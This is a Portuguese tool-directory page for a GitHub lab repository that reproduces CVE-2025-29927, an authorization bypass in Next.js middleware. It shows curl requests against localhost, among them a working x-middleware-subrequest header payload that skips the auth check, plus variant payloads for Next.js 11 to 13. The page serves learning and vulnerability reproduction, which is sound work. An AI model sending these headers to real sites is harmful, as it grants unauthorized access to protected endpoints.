Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 — vulnerable-nextjs-14-CVE-2025-29927 | Kitploit
Ferramentas/GitHubGitHub/sugib3o/vulnerable-nextjs-14-cve-2025-29927
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubsugib3o/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
14há 7 mesesAinda não revisado

Reprodução da bypass de autorização CVE-2025-29927

Este repositório é uma reprodução da vulnerabilidade CVE-2025-29927 no pacote next

Como reproduzir

  1. Siga os passos abaixo para clonar e executar a aplicação Next.js
  2. Teste que a autorização nega acesso ao endpoint /api/hello
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. Teste que a autorização funciona quando o token é fornecido
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. Agora ela também pode ser contornada se aninharmos middleware 5 vezes no cabeçalho especial x-middleware-subrequest:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

Exploração da CVE-2025-29927 em versões antigas do Next.js

As versões 12 e 13 do Next.js utilizavam uma convenção de nomenclatura diferente para o arquivo de middleware (_middleware.js), que foi alterada para middleware.js no Next.js 14. Essa vulnerabilidade pode ser explorada em versões antigas usando o arquivo _middleware.js.

Por exemplo, os seguintes payloads seriam aplicáveis, dependendo da versão do Next.js e da sua convenção de roteamento:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (para versões do Next.js 12.2 com o arquivo middleware.js na raiz da aplicação, não dentro do diretório pages)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (para versões do Next.js 11 até 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

Começando

Primeiro, execute o servidor de desenvolvimento:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

Abra http://localhost:3000 no seu navegador para ver o resultado.

Você pode começar a editar a página modificando o app/page.js. A página é atualizada automaticamente conforme você edita o arquivo.

Este projeto utiliza next/font para otimizar e carregar automaticamente a Geist, uma nova família de fontes para a Vercel.

Saiba Mais

Para saber mais sobre o Next.js, confira os seguintes recursos:

  • Documentação do Next.js - aprenda sobre os recursos e a API do Next.js.
  • Aprenda Next.js - um tutorial interativo do Next.js.

Você pode conferir o repositório do Next.js no GitHub - seus comentários e contribuições são bem-vindos!

Implantar na Vercel

A maneira mais fácil de implantar sua aplicação Next.js é usar a Plataforma Vercel dos criadores do Next.js.

Consulte nossa documentação de implantação do Next.js para mais detalhes.

Baixar ferramenta